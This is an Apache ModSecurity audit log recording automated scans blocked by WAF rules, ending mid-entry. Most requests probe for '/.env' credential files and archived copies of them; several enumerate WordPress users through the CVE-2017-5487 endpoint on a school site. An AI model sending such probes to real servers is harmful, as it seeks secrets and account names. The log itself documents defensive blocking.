Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1f8a9c12-Z-- --752d1977-A-- [09/Jun/2025:11:41:56 +0700] aEZmFE2r5gN9oSasJQyldwAAAMQ 103.236.140.4 45906 103.236.140.4 8181 --752d1977-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.193 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.193 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 UBrowser/5.6.13705.206 Safari/537.36 Accept-Charset: utf-8 --752d1977-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --752d1977-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749444116461351 917 (- - -) Stopwatch2: 1749444116461351 917; combined=360, p1=320, p2=0, p3=0, p4=0, p5=40, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --752d1977-Z-- --87110236-A-- [09/Jun/2025:11:50:07 +0700] aEZn_2IgvuFVSPOFHr8JNwAAAFc 103.236.140.4 45938 103.236.140.4 8181 --87110236-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 188.225.40.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 188.225.40.161 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --87110236-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --87110236-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749444607662886 2386 (- - -) Stopwatch2: 1749444607662886 2386; combined=1119, p1=361, p2=726, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87110236-Z-- --b1e2d117-A-- [09/Jun/2025:11:50:49 +0700] aEZoKWIgvuFVSPOFHr8JSAAAAEg 103.236.140.4 46124 103.236.140.4 8181 --b1e2d117-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 206.81.24.74 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 206.81.24.74 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --b1e2d117-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b1e2d117-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749444649414294 756 (- - -) Stopwatch2: 1749444649414294 756; combined=276, p1=240, p2=0, p3=0, p4=0, p5=36, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1e2d117-Z-- --e7bc8345-A-- [09/Jun/2025:11:52:41 +0700] aEZoma6OGK25CtJ36rMPCAAAAAc 103.236.140.4 46456 103.236.140.4 8181 --e7bc8345-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.29 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.29 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0 Safari/605.1.15 Accept-Charset: utf-8 --e7bc8345-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7bc8345-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749444761058769 808 (- - -) Stopwatch2: 1749444761058769 808; combined=351, p1=251, p2=0, p3=0, p4=0, p5=100, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7bc8345-Z-- --02777e1c-A-- [09/Jun/2025:12:09:01 +0700] aEZsba6OGK25CtJ36rMPpgAAAAE 103.236.140.4 47058 103.236.140.4 8181 --02777e1c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 70.39.90.111 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 70.39.90.111 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --02777e1c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --02777e1c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749445741989456 810 (- - -) Stopwatch2: 1749445741989456 810; combined=331, p1=291, p2=0, p3=0, p4=0, p5=39, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02777e1c-Z-- --6e5b763e-A-- [09/Jun/2025:14:21:46 +0700] aEaLimIgvuFVSPOFHr8KrAAAAEU 103.236.140.4 50590 103.236.140.4 8181 --6e5b763e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://smkn22-jkt.sch.id Host: smkn22-jkt.sch.id X-Real-IP: 156.239.203.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.239.203.74 X-Forwarded-Proto: https Connection: close Origin: https://smkn22-jkt.sch.id User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --6e5b763e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6e5b763e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749453706218890 2996 (- - -) Stopwatch2: 1749453706218890 2996; combined=1307, p1=437, p2=839, p3=0, p4=0, p5=30, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6e5b763e-Z-- --564d4751-A-- [09/Jun/2025:15:04:56 +0700] aEaVqGIgvuFVSPOFHr8KygAAAE0 103.236.140.4 50954 103.236.140.4 8181 --564d4751-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 113.180.153.127 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 113.180.153.127 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --564d4751-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --564d4751-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749456296136149 3545 (- - -) Stopwatch2: 1749456296136149 3545; combined=1475, p1=491, p2=945, p3=0, p4=0, p5=39, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --564d4751-Z-- --f961d53e-A-- [09/Jun/2025:15:15:39 +0700] aEaYK2IgvuFVSPOFHr8LuQAAAFA 103.236.140.4 54002 103.236.140.4 8181 --f961d53e-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 35.234.156.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.234.156.214 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --f961d53e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f961d53e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749456939464775 1161 (- - -) Stopwatch2: 1749456939464775 1161; combined=448, p1=411, p2=0, p3=0, p4=0, p5=37, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f961d53e-Z-- --8b4d107d-A-- [09/Jun/2025:15:15:40 +0700] aEaYLE2r5gN9oSasJQyolAAAAMk 103.236.140.4 54034 103.236.140.4 8181 --8b4d107d-B-- GET /sendgrid/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 35.234.156.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.234.156.214 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --8b4d107d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b4d107d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749456940587193 729 (- - -) Stopwatch2: 1749456940587193 729; combined=312, p1=281, p2=0, p3=0, p4=0, p5=31, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b4d107d-Z-- --e923bc70-A-- [09/Jun/2025:15:15:41 +0700] aEaYLa6OGK25CtJ36rMSnAAAABg 103.236.140.4 54070 103.236.140.4 8181 --e923bc70-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 35.234.156.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.234.156.214 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --e923bc70-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e923bc70-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749456941988876 885 (- - -) Stopwatch2: 1749456941988876 885; combined=305, p1=272, p2=0, p3=0, p4=0, p5=32, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e923bc70-Z-- --efc7472c-A-- [09/Jun/2025:15:16:42 +0700] aEaYak2r5gN9oSasJQyo7gAAANY 103.236.140.4 55730 103.236.140.4 8181 --efc7472c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.1.2; Redmi 4X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --efc7472c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --efc7472c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749457002044016 824 (- - -) Stopwatch2: 1749457002044016 824; combined=353, p1=313, p2=0, p3=0, p4=0, p5=40, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --efc7472c-Z-- --cb95cf73-A-- [09/Jun/2025:15:49:55 +0700] aEagM66OGK25CtJ36rMgfwAAAA0 103.236.140.4 48816 103.236.140.4 8181 --cb95cf73-B-- GET /core/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G955U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --cb95cf73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cb95cf73-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749458995562204 770 (- - -) Stopwatch2: 1749458995562204 770; combined=341, p1=299, p2=0, p3=0, p4=0, p5=42, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cb95cf73-Z-- --a5113762-A-- [09/Jun/2025:16:28:13 +0700] aEapLa6OGK25CtJ36rMsuQAAAAk 103.236.140.4 38246 103.236.140.4 8181 --a5113762-B-- GET /production/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3178.0 Safari/537.36 Accept-Charset: utf-8 --a5113762-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a5113762-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749461293425152 829 (- - -) Stopwatch2: 1749461293425152 829; combined=387, p1=345, p2=0, p3=0, p4=0, p5=41, sr=131, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a5113762-Z-- --f5c2d60f-A-- [09/Jun/2025:16:49:26 +0700] aEauJq6OGK25CtJ36rMvBwAAAA0 103.236.140.4 44100 103.236.140.4 8181 --f5c2d60f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 164.92.221.46 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 164.92.221.46 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --f5c2d60f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f5c2d60f-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749462566441454 906 (- - -) Stopwatch2: 1749462566441454 906; combined=387, p1=327, p2=0, p3=0, p4=0, p5=60, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f5c2d60f-Z-- --2c258e50-A-- [09/Jun/2025:17:41:12 +0700] aEa6SGIgvuFVSPOFHr8jwQAAAEE 103.236.140.4 45918 103.236.140.4 8181 --2c258e50-B-- GET /.env.zip HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.59.160.164 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.59.160.164 X-Forwarded-Proto: http Connection: close user-agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-ca; GT-P5113 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 Accept: */* --2c258e50-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2c258e50-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749465672247669 887 (- - -) Stopwatch2: 1749465672247669 887; combined=340, p1=280, p2=0, p3=0, p4=0, p5=60, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2c258e50-Z-- --fce57a73-A-- [09/Jun/2025:17:41:14 +0700] aEa6Sq6OGK25CtJ36rMwLAAAABU 103.236.140.4 45920 103.236.140.4 8181 --fce57a73-B-- GET /.env.rar HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.59.160.164 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.59.160.164 X-Forwarded-Proto: http Connection: close user-agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-ca; GT-P5113 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 Accept: */* --fce57a73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fce57a73-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749465674224994 779 (- - -) Stopwatch2: 1749465674224994 779; combined=309, p1=272, p2=0, p3=0, p4=0, p5=37, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fce57a73-Z-- --4116b623-A-- [09/Jun/2025:17:41:15 +0700] aEa6S66OGK25CtJ36rMwLQAAAA4 103.236.140.4 45922 103.236.140.4 8181 --4116b623-B-- GET /.env.tar HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.59.160.164 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.59.160.164 X-Forwarded-Proto: http Connection: close user-agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-ca; GT-P5113 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 Accept: */* --4116b623-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4116b623-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749465675501848 916 (- - -) Stopwatch2: 1749465675501848 916; combined=353, p1=313, p2=0, p3=0, p4=0, p5=40, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4116b623-Z-- --991b1c30-A-- [09/Jun/2025:17:41:16 +0700] aEa6TK6OGK25CtJ36rMwLgAAAAE 103.236.140.4 45924 103.236.140.4 8181 --991b1c30-B-- GET /.env.tar.gz HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.59.160.164 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.59.160.164 X-Forwarded-Proto: http Connection: close user-agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-ca; GT-P5113 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 Accept: */* --991b1c30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --991b1c30-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749465676416719 658 (- - -) Stopwatch2: 1749465676416719 658; combined=256, p1=224, p2=0, p3=0, p4=0, p5=31, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --991b1c30-Z-- --e599fc2d-A-- [09/Jun/2025:18:58:47 +0700] aEbMd66OGK25CtJ36rMyTQAAABI 103.236.140.4 49958 103.236.140.4 8181 --e599fc2d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.206.132.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.206.132.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e599fc2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e599fc2d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s 